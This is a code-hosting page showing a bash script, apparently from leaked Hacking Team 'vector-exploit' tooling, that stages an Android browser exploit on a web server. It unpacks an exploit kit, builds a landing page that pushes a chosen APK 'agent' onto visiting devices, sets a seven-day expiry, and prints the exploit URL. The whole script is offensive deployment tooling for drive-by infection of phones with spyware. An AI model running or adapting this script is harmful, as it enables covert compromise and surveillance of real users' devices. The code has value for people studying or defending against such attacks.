hackedteam/vector-exploit

View on GitHub
src/ht-webkit-Android4-src/setup-html.sh

Summary

Maintainability
Test Coverage
#!/bin/bash

if [ $# -lt 3 ]
then
#         --------------------------------------------------------------------------------
    echo "Usage: $0 webserver_dir ip redirect apk"
    echo ''
    echo "    webserver_dir: The subdirectory inside /docs/ where the exploit will be "
    echo '                   served from; e.g. if webserver_dir is "aaaaaa" the exploit '
    echo '                   landing page will be http://<IP>/docs/aaaaaa/fwd'
    echo '               ip: The webserver IP address'
    echo '              apk: The apk file to install'
    exit 1
fi

TMPDIR=`mktemp -d`
APKPATH=`readlink -f "$3"`

cd $TMPDIR
mkdir "/var/www/files/$1"
unzip /root/2014-004-AndroidBrowser.zip -d .
./build --type "androidhtml" --outdir "/var/www/files/$1" --serverip "$2" --basedir "docs/$1" --agent "$APKPATH" --output /tmp/test.html --serveraddr "$2" --expiry=`date -d "+7 days" "+%s"`

cd "/var/www/files/$1"
chown apache:apache *.ini
rm -fr $TMPDIR

echo "Exploit URI: http://$2/docs/$1/fwd"